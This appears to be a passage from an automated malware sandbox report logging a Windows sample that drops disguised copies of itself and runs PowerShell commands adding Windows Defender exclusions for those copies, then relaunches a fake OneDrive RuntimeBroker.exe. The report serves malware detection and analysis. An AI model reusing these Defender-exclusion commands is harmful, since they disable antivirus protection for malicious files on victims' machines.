                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594172
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 594051
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593922
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593813
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593697
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593594
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593482
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593375
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 300000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593266
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593155
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 593037
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592884
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592779
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592563
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592453
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592338
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 592188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591672
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591533
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591406
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591297
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591188
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 591078
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590967
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590847
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590719
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590609
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590500
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590388
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 590268
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeQueries volume information: C:\Users\user\Desktop\EQdhBjQw4G.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
